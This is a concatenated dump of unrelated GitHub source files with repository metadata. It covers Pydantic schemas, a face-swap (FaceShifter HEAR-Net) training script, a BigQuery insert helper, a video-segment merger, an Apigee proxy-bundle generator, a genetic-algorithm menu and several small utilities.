CreateVehicle(BaseVehicle):\n pass\n\n\nclass UpdateVehicle(BaseModel):\n update_employee_id: Optional[str]\n brand: Optional[str]\n model: Optional[str]\n color: Optional[str]\n vehicle_type: Optional[str]\n state: Optional[str]\n\n\nclass VehicleInDB(BaseVehicle):\n created_at: datetime\n last_modified: datetime\n\n class Config:\n orm_mode = True\n","repo_name":"DanielSantaR/final-web","sub_path":"app/schemas/vehicle.py","file_name":"vehicle.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25178911547","text":"import concraft\nimport wdnet\n\ndef analyse(sentence, concraftClient):\n for word in concraftClient.lemmatize(sentence).split():\n print(word)\n hyponyms = wdnet.get_hyponyms(word, 2)\n for hyponym in set(hyponyms):\n print (\"\\t{0}\".format(hyponym))\n\nserver = concraft.Server()\nport = server.get_port()\nclient = concraft.Client(port)\n\nsentence = input(\"Please wait for the server to load and then enter a sentence\\n\")\nanalyse(sentence, client)\nwhile (True):\n sentence = input(\"Please enter another sentence or leave a blank line to exit:\\n\")\n if not sentence:\n break\n analyse(sentence, client)\n","repo_name":"sbdzdz/ivr-synsets","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"2099359749","text":"from network.AEI_Net import *\nfrom 
network.HEAR_Net import *\nfrom utils.Dataset import *\nfrom torch.utils.data import DataLoader\nimport torch.optim as optim\nfrom face_modules.model import Backbone, Arcface, MobileFaceNet, Am_softmax, l2_norm\nimport torch.nn.functional as F\nimport torch\nimport time\nimport numpy as np\nimport torchvision\nimport cv2\nfrom apex import amp\nimport visdom\n\n\nvis = visdom.Visdom(server='127.0.0.1', env='faceshifter', port=8099)\nbatch_size = 32\nlr = 4e-4\nmax_epoch = 2000\nshow_step = 10\nsave_epoch = 1\nmodel_save_path = './saved_models/'\noptim_level = 'O1'\n\ndevice = torch.device('cuda')\n\nG = AEI_Net(c_id=512).to(device)\nG.eval()\nG.load_state_dict(torch.load('./saved_models/G_latest.pth', map_location=torch.device('cpu')), strict=True)\n\nnet = HearNet()\nnet.train()\nnet.to(device)\n\narcface = Backbone(50, 0.6, 'ir_se').to(device)\narcface.eval()\narcface.load_state_dict(torch.load('./face_modules/model_ir_se50.pth', map_location=device), strict=False)\n\nopt = optim.Adam(net.parameters(), lr=lr, betas=(0, 0.999))\n\nnet, opt = amp.initialize(net, opt, opt_level=optim_level)\n\ntry:\n net.load_state_dict(torch.load('./saved_models/HEAR_latest.pth', map_location=torch.device('cpu')), strict=False)\nexcept Exception as e:\n print(e)\n\ndataset = AugmentedOcclusions('../hearnet_data',\n ['../ego_hands_png'],\n ['../shapenet_png'], same_prob=0.5)\ndataloader = DataLoader(dataset, batch_size=batch_size, shuffle=True, num_workers=0, drop_last=True)\n\nMSE = torch.nn.MSELoss()\nL1 = torch.nn.L1Loss()\n\n\ndef get_numpy_image(X):\n X = X[:8]\n X = torchvision.utils.make_grid(X.detach().cpu(), nrow=X.shape[0]).numpy() * 0.5 + 0.5\n X = X.transpose([1,2,0])*255\n np.clip(X, 0, 255).astype(np.uint8)\n return X\n\n\ndef make_image(Xs, Xt, Y):\n Xs = get_numpy_image(Xs)\n Xt = get_numpy_image(Xt)\n Y = get_numpy_image(Y)\n return np.concatenate((Xs, Xt, Y), axis=0).transpose([2, 0, 1])\n\nprint(torch.backends.cudnn.benchmark)\n#torch.backends.cudnn.benchmark = True\nfor epoch in range(0, max_epoch):\n # torch.cuda.empty_cache()\n for iteration, data in enumerate(dataloader):\n start_time = time.time()\n Xs, Xt, same_person = data\n Xs = Xs.to(device)\n Xt = Xt.to(device)\n with torch.no_grad():\n embed_s, _ = arcface(F.interpolate(Xs[:, :, 19:237, 19:237], [112, 112], mode='bilinear', align_corners=True))\n embed_t, _ = arcface(F.interpolate(Xt[:, :, 19:237, 19:237], [112, 112], mode='bilinear', align_corners=True))\n same_person = same_person.to(device)\n\n # train G\n opt.zero_grad()\n with torch.no_grad():\n Yst_hat, _ = G(Xt, embed_s)\n Ytt, _ = G(Xt, embed_t)\n\n dYt = Xt - Ytt\n hear_input = torch.cat((Yst_hat, dYt), dim=1)\n Yst = net(hear_input)\n\n Yst_aligned = Yst[:, :, 19:237, 19:237]\n\n id_Yst, _ = arcface(F.interpolate(Yst_aligned, [112, 112], mode='bilinear', align_corners=True))\n\n L_id =(1 - torch.cosine_similarity(embed_s, id_Yst, dim=1)).mean()\n\n L_chg = L1(Yst_hat, Yst)\n\n L_rec = torch.sum(0.5 * torch.mean(torch.pow(Yst - Xt, 2).reshape(batch_size, -1), dim=1) * same_person) / (same_person.sum() + 1e-6)\n\n loss = L_id + L_chg + L_rec\n with amp.scale_loss(loss, opt) as scaled_loss:\n scaled_loss.backward()\n\n # loss.backward()\n opt.step()\n\n batch_time = time.time() - start_time\n if iteration % show_step == 0:\n image = make_image(Xs, Xt, Yst)\n vis.image(image, opts={'title': 'HEAR'}, win='HEAR')\n cv2.imwrite('./gen_images/HEAR_latest.jpg', image.transpose([1,2,0])[:,:,::-1])\n print(f'epoch: {epoch} {iteration} / {len(dataloader)}')\n print(f'loss: 
{loss.item()} batch_time: {batch_time}s')\n print(f'L_id: {L_id.item()} L_chg: {L_chg.item()} L_rec: {L_rec.item()}')\n if iteration % 1000 == 0:\n torch.save(net.state_dict(), './saved_models/HEAR_latest.pth')\n\n\n","repo_name":"taotaonice/FaceShifter","sub_path":"train_HEAR.py","file_name":"train_HEAR.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"19"} +{"seq_id":"5225909015","text":"# Damon Incorvaia\n# CSC 351 Spring 2023\n\nclass PiggyBank:\n\n def __init__(self, amount):\n self.amount = amount\n\n def deposit(self, dep_amount):\n self.amount += dep_amount\n return self.amount\n\n def withdraw(self, with_amount):\n if with_amount > self.amount:\n real_amount = self.amount\n self.amount = 0\n return real_amount\n\n else:\n self.amount -= with_amount\n return with_amount\n\ndef main():\n pig = PiggyBank(25)\n print(f\"Piggy Bank Initialized with {pig.amount} dollars.\")\n\n escape = 0\n while escape != 3:\n print(\"=\"*15)\n print(\"Select an option:\")\n print(\"1. Deposit\\n2. Withdraw\\n3. Exit\")\n escape = input()\n escape = int(escape)\n\n if escape == 1:\n dep_input = input(\"Enter the amount to deposit: \")\n dep_input = int(dep_input)\n print(f\"You deposited {dep_input}. You now have {pig.deposit(dep_input)}.\")\n\n if escape == 2:\n with_input = input(\"Enter the amount to withdraw: \")\n with_input = int(with_input)\n print(f\"You attempted to withdraw {with_input}. You got {pig.withdraw(with_input)}.\")\n \nmain()","repo_name":"damoninc/CSC-351","sub_path":"piggybank.py","file_name":"piggybank.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3633703464","text":"from typing import Sequence, Mapping\n\nfrom datetime import datetime\n\nfrom google.cloud import bigquery\n\n\ndef write_summarization_to_table(\n project_id: str,\n dataset_id: str,\n table_id: str,\n bucket: str,\n filename: str,\n complete_text: str,\n complete_text_uri: str,\n summary: str,\n summary_uri: str,\n timestamp: datetime,\n) -> Sequence[Mapping]:\n \"\"\"Updates the BigQuery table with the document summarization\n\n Original sample is here:\n https://cloud.google.com/bigquery/docs/samples/bigquery-table-insert-rows-explicit-none-insert-ids\n\n Args:\n project_id (str): the Google Cloud project ID\n dataset_id (str): the name of the BigQuery dataset\n table_id (str): the name of the BigQuery table\n bucket (str): the name of the bucket with the PDF\n filename (str): path of PDF relative to bucket root\n complete_text (str): the complete text of the PDF\n complete_text_uri (str): the Storage URI of the complete TXT document\n summary (str): the text summary of the document\n summary_uri (str): the Storage URI of the summary TXT document\n timestamp (datetime): when the processing occurred\n \"\"\"\n if (project_id == \"\") or (dataset_id == \"\") or (table_id == \"\"):\n return [ValueError(\"project_id, dataset_id, or table_id is missing\")]\n\n if (\n (bucket == \"\")\n and (filename == \"\")\n and (complete_text == \"\")\n and (summary_uri == \"\")\n and (summary == \"\")\n and (complete_text_uri == \"\")\n and (timestamp is None)\n ):\n return [ValueError(\"no row data provided for updating table\")]\n client = bigquery.Client()\n\n table_name = f\"{project_id}.{dataset_id}.{table_id}\"\n\n rows_to_insert = [\n {\n \"bucket\": bucket,\n \"filename\": filename,\n \"extracted_text\": complete_text,\n 
\"summary_uri\": summary_uri,\n \"summary\": summary,\n \"complete_text_uri\": complete_text_uri,\n \"timestamp\": timestamp.isoformat(),\n }\n ]\n\n errors = client.insert_rows_json(\n table_name, rows_to_insert, row_ids=bigquery.AutoRowIDs.GENERATE_UUID\n )\n\n return errors\n","repo_name":"GoogleCloudPlatform/terraform-genai-doc-summarization","sub_path":"webhook/bigquery.py","file_name":"bigquery.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"19"} +{"seq_id":"25760839082","text":"\"\"\"\r\n@author: JerryYang\r\n@file: movies_m3u8_ts_marge.py\r\n@time: 2023/6/8 21:06\r\n@desc: OK(合并后的文件在ts文件同目录,扩展名为mp4\r\n\"\"\"\r\nimport os\r\n\r\n\r\ndef get_sorted_filenames(folder_path):\r\n \"\"\"\r\n\r\n 获取指定文件夹下的所有文件名,并返回一个按数字大小排序的列表。\r\n\r\n \"\"\"\r\n\r\n filenames = []\r\n\r\n for filename in os.listdir(folder_path):\r\n\r\n if os.path.isfile(os.path.join(folder_path, filename)):\r\n num = int(filename.split('.')[0]) # 从文件名中提取数字部分\r\n\r\n filenames.append((num, filename)) # 将数字和文件名组成元组,添加到列表中\r\n\r\n filenames.sort() # 对列表进行排序\r\n\r\n return [f[1] for f in filenames]\r\n\r\n\r\n# def get_filenames(save_path):\r\n# \"\"\"\r\n#\r\n# 获取指定文件夹下的所有文件名,并返回一个列表。\r\n#\r\n# \"\"\"\r\n#\r\n# filenames = []\r\n#\r\n# for filename in os.listdir(save_path):\r\n#\r\n# if os.path.isfile(os.path.join(save_path, filename)):\r\n# filenames.append(filename)\r\n#\r\n# return filenames\r\n\r\n\r\ndef merge_ts_files(output_file, ts_files, save_path):\r\n '''\r\n 合并ts文件\r\n :param output_file: 合并后的文件名\r\n :param ts_files: 需要合并的TS文件列表\r\n :param save_path: 文件路径\r\n :return:\r\n '''\r\n with open(save_path + output_file, 'wb') as outfile:\r\n for ts_file in ts_files:\r\n with open(save_path + ts_file, 'rb') as infile:\r\n outfile.write(infile.read())\r\n\r\n\r\nif __name__ == '__main__':\r\n save_path = 'D:/pythonProject/爬虫/movie/锦衣之下(7)/'\r\n\r\n ts_files = get_sorted_filenames(save_path) # 需要合并的TS文件列表\r\n print(ts_files)\r\n\r\n output_file = save_path.split('/')[-2]+'.mp4' # 合并后的TS文件名\r\n print(output_file)\r\n\r\n merge_ts_files(output_file, ts_files, save_path)\r\n","repo_name":"JerryYangJ/MyFirstProject","sub_path":"爬虫/movies_m3u8_ts_marge.py","file_name":"movies_m3u8_ts_marge.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34253042655","text":"import unittest\n\nfrom force_wfmanager.notifications.ui_notification_hooks_manager \\\n import \\\n UINotificationHooksManager\nfrom force_wfmanager.notifications.ui_notification_plugin import \\\n UINotificationPlugin\n\n\nclass TestUINotificationHooksFactory(unittest.TestCase):\n def setUp(self):\n self.plugin = UINotificationPlugin()\n self.factory = self.plugin.ui_hooks_factories[0]\n\n def test_initialization(self):\n self.assertEqual(self.factory.plugin_id, self.plugin.id)\n self.assertEqual(self.factory.plugin_name, self.plugin.name)\n\n def test_create_ui_hooks_manager(self):\n self.assertIsInstance(\n self.factory.create_ui_hooks_manager(),\n UINotificationHooksManager)\n","repo_name":"force-h2020/force-wfmanager","sub_path":"force_wfmanager/notifications/tests/test_ui_notification_hooks_factory.py","file_name":"test_ui_notification_hooks_factory.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"37095191911","text":"import sys\nimport click\nfrom 
rixtribute.commands.ec2 import ec2 as ec2_commands\nfrom rixtribute.commands.ecr import ecr as ecr_commands\nfrom rixtribute.commands.container import container as container_commands\nfrom rixtribute.commands.init import init as init_commands\nfrom rixtribute.commands.run import run as run_commands\n\nCONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])\n\n@click.group(invoke_without_command=True, context_settings=CONTEXT_SETTINGS)\n@click.pass_context\n@click.option('--verbose', '-v', is_flag=True, help=\"Increase output verbosity\")\ndef main(ctx, verbose):\n group_commands = main.list_commands(ctx)\n\n if ctx.invoked_subcommand is None:\n # No command supplied\n # Inform user on the available commands when running the app\n\n click.echo(\"Specify one of the commands below:\")\n click.echo(\"----------------------------------\")\n print(*group_commands, sep='\\n')\n\n ctx.obj = {\n 'VERBOSE': verbose\n }\n\n\n\n## Add command groups\nmain.add_command(ec2_commands)\nmain.add_command(ecr_commands)\nmain.add_command(container_commands)\nmain.add_command(init_commands)\nmain.add_command(run_commands)\n","repo_name":"jesperrix/rixtribute","sub_path":"rixtribute/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"34856520107","text":"def fib(n):\n\n if n <= 1:\n return n \n else:\n return(fib(n-1) + fib(n-2))\n\n\ndef lucas(n):\n\n if n == 0:\n return 2\n\n elif n == 1:\n return 1\n \n elif n == 2:\n return 3\n \n else:\n return(lucas(n-1) + lucas(n-2))\n\n\ndef sum_series(x,y=0,z=1):\n\n if x == 0:\n return y\n if x == 1:\n return z \n else:\n return(sum_series(x-1, y, z) + sum_series(x-2, y, z))\n \n\n","repo_name":"everydaytimmy/math-series","sub_path":"math_series/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23100582485","text":"from algorithms.binary import BinaryGA\r\nfrom algorithms.floating import FloatGA\r\nfrom run import run as run_genetic\r\nfrom functions import *\r\n\r\nimport numpy as np\r\n \r\n\r\nPARAMETERS = {\r\n 'p': 'Population size',\r\n 'd': 'Result display [binary, float]',\r\n 'e': 'Precision (decimals count)',\r\n 'm': 'Mutation probability',\r\n 'c': 'Maximum function evaluations allowed',\r\n 'r': 'Upper and lower boundaries',\r\n 'v': 'Number of variables',\r\n 'f': 'Function used (f1, f3, f6, f7)',\r\n 't': 'Tournament size',\r\n}\r\n\r\nVALUES = {\r\n 'p': 150,\r\n 'd': 'float',\r\n 'r': [-50, 150],\r\n 'e': 5,\r\n 'm': 0.1,\r\n 'c': 20000,\r\n 'v': 2,\r\n 'f': 'f1',\r\n 't': 3,\r\n}\r\n\r\nTYPES = {\r\n 'int': 'pevtc',\r\n 'float': 'm',\r\n 'str': 'df',\r\n 'rng': 'r'\r\n}\r\n\r\nFUNCTIONS = {\r\n 'f1': function_1,\r\n 'f3': function_3,\r\n 'f6': function_6,\r\n 'f7': function_7,\r\n}\r\n\r\nchange = input(\"Want to change some parameters? 
[y/n]: \") in 'yes|Yes'\r\nif change:\r\n print(\"Parameter keys:\")\r\n for p in PARAMETERS:\r\n print(\"\\t\" + p + ' - ' + PARAMETERS[p] + ' (' + str(VALUES[p]) + ')')\r\n print(\"\\ta - All parameters\")\r\n parameters = input(\"List the parameter keys you wish to input: \")\r\n if parameters == 'a':\r\n parameters = 'pdmeftrv'\r\n for p in parameters:\r\n if p == 'a':\r\n print(\"Sorry, 'a' does not go with others!\")\r\n value = input('\\t' + PARAMETERS[p] + \" value: \")\r\n if p in TYPES['int']:\r\n VALUES[p] = int(value)\r\n elif p in TYPES['float']:\r\n VALUES[p] = float(value)\r\n elif p in TYPES['str']:\r\n VALUES[p] = value\r\n elif p in TYPES['rng']:\r\n value = value.split(' ')\r\n VALUES[p] = [int(v) for v in value]\r\n \r\nprint(\"All right! The values used will be:\")\r\nfor p in VALUES:\r\n print(\"\\t\" + PARAMETERS[p] + \":\", VALUES[p])\r\n\r\nalgorithm = BinaryGA if VALUES['d'] == 'binary' else FloatGA\r\n\r\nrun_genetic(VALUES, algorithm, FUNCTIONS[VALUES['f']])","repo_name":"amalija-ramljak/apr_lab","sub_path":"lab 4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28560462040","text":"from xml.etree.ElementTree import Element, SubElement, tostring\nfrom module_utils.swagger_converter import _swagger_to_xml\nfrom module_utils.quota import Quota\nfrom module_utils.spike_arrest import SpikeArrest\nfrom module_utils.key_value_map_operations import KeyValueMapOperations\nfrom module_utils.authentication import Authentication\nfrom module_utils.fault_rule import FaultRule\nfrom module_utils.assign_message import AssignMessage\nfrom module_utils.raise_fault import RaiseFault\nfrom module_utils.cors import Cors\n\n\nclass ApiProxyBundle:\n def __init__(self, proxy_name, team_name, description, base_path, api_proxy_base_path):\n self._authentication_policy = Authentication()\n self._swagger_xml = ''\n self._description = description\n self.policies = []\n self._pre_flow_policies = []\n self._pre_flow_response_policies = []\n self._target_endpoint_policies = []\n self._fault_rules = []\n self._base_path = base_path\n self._api_proxy_base_path = api_proxy_base_path\n self._api_name = proxy_name\n self._api_team = team_name\n self._name = self.set_saas_prefix(\"SaaS\")\n self._target_connection_element = self._define_saas_target_element()\n\n def __str__(self):\n return \"Proxy Bundle Generator Class\"\n\n def api_name(self):\n return self._name\n\n def import_swagger(self, swagger_json):\n self._swagger_xml = _swagger_to_xml(swagger_json)\n\n def skip_authorization(self, methods):\n self._authentication_policy.ignore_this_methods(methods)\n\n @staticmethod\n def _xml_document_to_string(document):\n return tostring(document, encoding='utf8', method='xml').decode()\n\n def add_authentication(self):\n environment_values = KeyValueMapOperations(self._name)\n self.policies.append(environment_values)\n self._add_policy_pre_flow(environment_values)\n authentication = Authentication()\n self._authentication_policy = authentication\n self._add_policy_pre_flow(authentication)\n\n def add_quota_trial(self):\n quota = Quota('QuotaTrial', 1, 'month', 10000)\n self._add_policy_pre_flow(quota)\n fault_rule = self._new_fault_rule('RiseMessageTrialQuotaExceeded', 'ratelimit.QuotaTrial.failed = true')\n\n message = AssignMessage('TrialQuotaExceeded')\n message.return_json({\n \"error\": \"429\",\n \"description\": \"Quota Exceeded, please contact the Api 
Management Team\"\n })\n message.add_condition('fault.name Matches \"QuotaViolation\"')\n self.policies.append(message)\n fault_rule.add_policy(message)\n\n def add_quota(self, interval, time_unit, count):\n quota = Quota('Quota', interval, time_unit, count)\n self._add_policy_pre_flow(quota)\n\n def _new_fault_rule(self, name, condition):\n fault_rule = FaultRule(name, condition)\n self._fault_rules.append(fault_rule)\n return fault_rule\n\n def add_spike_arrest(self, spike_arrest_value, unit):\n spike_arrest = SpikeArrest(spike_arrest_value, unit)\n self._add_policy_pre_flow(spike_arrest)\n\n def add_cors(self, allow_origin, allow_headers):\n for policy in self.policies:\n policy.skip_verb_options()\n\n cors_policy = Cors(allow_origin, allow_headers)\n\n flow = SubElement(self._swagger_xml, 'Flow')\n flow.set(\"name\", \"CORS preflight\")\n cors_policy.add_cors_step_xml(flow)\n\n self._add_policy_pre_flow_response(cors_policy)\n\n fault_rule = self._new_fault_rule('cors-fault-rule', '(response.status.code != \"200\")')\n fault_rule.add_policy(cors_policy)\n\n def _add_policy_pre_flow_response(self, policy):\n self.policies.append(policy)\n self._pre_flow_response_policies.append(policy)\n\n def _add_policy_pre_flow(self, policy):\n self.policies.append(policy)\n self._pre_flow_policies.append(policy)\n\n def _add_target_endpoint_policy(self, policy):\n self.policies.append(policy)\n self._target_endpoint_policies.append(policy)\n\n def add_proxy_health(self, web_method_name, api_proxy_tag):\n fault_policy = RaiseFault(\"ProxyHealth\")\n fault_policy.fault_response(\n 200,\n \"Proxy OK!\",\n {\"proxy-status\": \"running\", \"environment\": \"{environment.name}\", \"Proxy Version\": api_proxy_tag})\n fault_policy.add_condition('proxy.pathsuffix MatchesPath \"/{}\"'.format(web_method_name))\n self._add_policy_pre_flow(fault_policy)\n\n def targets_default_xml(self):\n target_endpoint = Element('TargetEndpoint')\n target_endpoint.set('name', 'default')\n\n SubElement(target_endpoint, 'Description')\n target_fault_rules = SubElement(target_endpoint, 'FaultRules')\n for p in self._pre_flow_response_policies:\n if p._name == \"add-cors\":\n fault_rule = self._new_fault_rule('cors-fault-rule', '(response.status.code != \"200\")')\n fault_rule.add_policy(p)\n fault_rule.add_to_parent_node(target_fault_rules)\n\n pre_flow = SubElement(target_endpoint, 'PreFlow')\n pre_flow.set('name', 'PreFlow')\n pre_flow_request = SubElement(pre_flow, 'Request')\n for p in self._target_endpoint_policies:\n p.add_step_xml(pre_flow_request)\n SubElement(pre_flow, 'Response')\n\n SubElement(target_endpoint, 'Flows')\n\n post_flow = SubElement(target_endpoint, 'PostFlow')\n post_flow.set('name', 'PostFlow')\n post_flow_request = SubElement(post_flow, 'Request')\n for p in self._target_endpoint_policies:\n p.add_step_xml(post_flow_request)\n SubElement(post_flow, 'Response')\n\n target_endpoint.append(self._target_connection_element)\n\n for p in self._target_endpoint_policies:\n default_rule = SubElement(target_endpoint, 'DefaultFaultRule')\n default_rule.set('name', 'default_rule')\n always_enforce = SubElement(default_rule, 'AlwaysEnforce')\n always_enforce.text = 'true'\n p.add_step_xml(default_rule)\n\n return self._xml_document_to_string(target_endpoint)\n\n def _define_saas_target_element(self):\n http_target_connection = Element('HTTPTargetConnection')\n server_element = SubElement(http_target_connection, 'LoadBalancer')\n server = SubElement(server_element, 'Server')\n server.set('name', self._name)\n path = 
SubElement(http_target_connection, 'Path')\n path.text = self._base_path\n return http_target_connection\n\n def define_url_in_target(self, api_url, api_base_path):\n http_target_connection = Element('HTTPTargetConnection')\n url = SubElement(http_target_connection, 'URL')\n url.text = api_url + api_base_path\n self._target_connection_element = http_target_connection\n\n def manifests_manifest_xml(self):\n manifest = Element('Manifest')\n manifest.set('name', 'manifest')\n\n policies = SubElement(manifest, 'Policies')\n for policy in self.policies:\n policy_xml_node = SubElement(policies, 'VersionInfo')\n policy_xml_node.set('resourceName', policy.name())\n\n proxy_endpoints = SubElement(manifest, 'ProxyEndpoints')\n version_info = SubElement(proxy_endpoints, 'VersionInfo')\n version_info.set('resourceName', 'default')\n\n target_endpoints = SubElement(manifest, 'TargetEndpoints')\n version_info = SubElement(target_endpoints, 'VersionInfo')\n version_info.set('resourceName', 'default')\n\n return self._xml_document_to_string(manifest)\n\n def proxies_default_xml(self):\n proxy_endpoint = Element('ProxyEndpoint')\n proxy_endpoint.set('name', 'default')\n\n SubElement(proxy_endpoint, 'Description')\n\n pre_flow = SubElement(proxy_endpoint, 'PreFlow')\n pre_flow.set('name', 'PreFlow')\n request = SubElement(pre_flow, 'Request')\n\n for p in self._pre_flow_policies:\n p.add_step_xml(request)\n\n response = SubElement(pre_flow, 'Response')\n for p in self._pre_flow_response_policies:\n p.add_step_xml(response)\n\n post_flow = SubElement(proxy_endpoint, 'PostFlow')\n SubElement(post_flow, 'Request')\n SubElement(post_flow, 'Response')\n\n fault_rules_xml = SubElement(proxy_endpoint, 'FaultRules')\n for f in self._fault_rules:\n f.add_to_parent_node(fault_rules_xml)\n\n if self._swagger_xml:\n proxy_endpoint.append(self._swagger_xml)\n else:\n SubElement(proxy_endpoint, 'Flows')\n\n http_proxy_connection = SubElement(proxy_endpoint, 'HTTPProxyConnection')\n base_path = SubElement(http_proxy_connection, 'BasePath')\n base_path.text = '/{}/{}{}'.format(self._api_team, self._api_name, self._api_proxy_base_path)\n SubElement(http_proxy_connection, 'Properties')\n virtual_host = SubElement(http_proxy_connection, 'VirtualHost')\n virtual_host.text = 'ey'\n\n for p in self._pre_flow_response_policies:\n if p._name == \"add-cors\":\n route_rule = SubElement(proxy_endpoint, 'RouteRule')\n route_rule.set('name', 'NoRoute')\n target_endpoint = SubElement(route_rule, 'Condition')\n target_endpoint.text = 'request.verb == \"OPTIONS\" AND '\\\n 'request.header.origin != null AND ' \\\n 'request.header.Access-Control-Request-Method != null'\n\n route_rule = SubElement(proxy_endpoint, 'RouteRule')\n route_rule.set('name', 'default')\n target_endpoint = SubElement(route_rule, 'TargetEndpoint')\n target_endpoint.text = 'default'\n\n return self._xml_document_to_string(proxy_endpoint)\n\n def main_xml_filename(self):\n return self._name + \".xml\"\n\n def main_xml(self):\n api_proxy = Element('APIProxy')\n api_proxy.set('name', self._name)\n\n base_paths = SubElement(api_proxy, 'BasePaths')\n base_paths.text = '/{}/{}{}'.format(self._api_team, self._api_name, self._api_proxy_base_path)\n\n configuration_version = SubElement(api_proxy, 'ConfigurationVersion')\n configuration_version.set('majorVersion', '4')\n configuration_version.set('minorVersion', '0')\n\n description = SubElement(api_proxy, 'Description')\n description.text = self._description\n\n display_name = SubElement(api_proxy, 'DisplayName')\n 
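# Apigee shows DisplayName as the proxy's name in its UI; here it simply mirrors the generated bundle name.\n 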
display_name.text = self._name\n\n policies = SubElement(api_proxy, 'Policies')\n for policy in self.policies:\n policy_xml_node = SubElement(policies, 'Policy')\n policy_xml_node.text = policy.name()\n\n proxy_endpoints = SubElement(api_proxy, 'ProxyEndpoints')\n proxy_endpoint = SubElement(proxy_endpoints, 'ProxyEndpoint')\n proxy_endpoint.text = \"default\"\n\n resources = SubElement(api_proxy, 'Resources')\n resource = SubElement(resources, 'Resource')\n resource.text = \"openapi://association.json\"\n\n target_endpoints = SubElement(api_proxy, 'TargetEndpoints')\n target_endpoint = SubElement(target_endpoints, 'TargetEndpoint')\n target_endpoint.text = \"default\"\n\n return self._xml_document_to_string(api_proxy)\n\n def set_microgateway_prefix(self, prefix):\n self._name = prefix + \"_\" + self._name\n\n def set_saas_prefix(self, prefix):\n return prefix + \"_\" + self._api_team + \"_\" + self._api_name\n","repo_name":"lalvar1/xml_builder","sub_path":"module_utils/api_proxy_bundle.py","file_name":"api_proxy_bundle.py","file_ext":"py","file_size_in_byte":11526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24896144130","text":"from employee.models import StudentStudyRecord\n\nfrom django.utils.safestring import mark_safe\n\nfrom django.template import Library\n\nregister = Library()\n\n\n@register.filter\ndef select_default(val):\n choices_list = StudentStudyRecord.record_choices\n html = ''\n for i in choices_list:\n if val == i[0]:\n html += \"<option value='%s' selected>%s</option>\" % (i[0], i[1])\n else:\n html += \"<option value='%s'>%s</option>\" % (i[0], i[1])\n\n return mark_safe(html)\n","repo_name":"429572064/CRM","sub_path":"employee/templatetags/select_default.py","file_name":"select_default.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}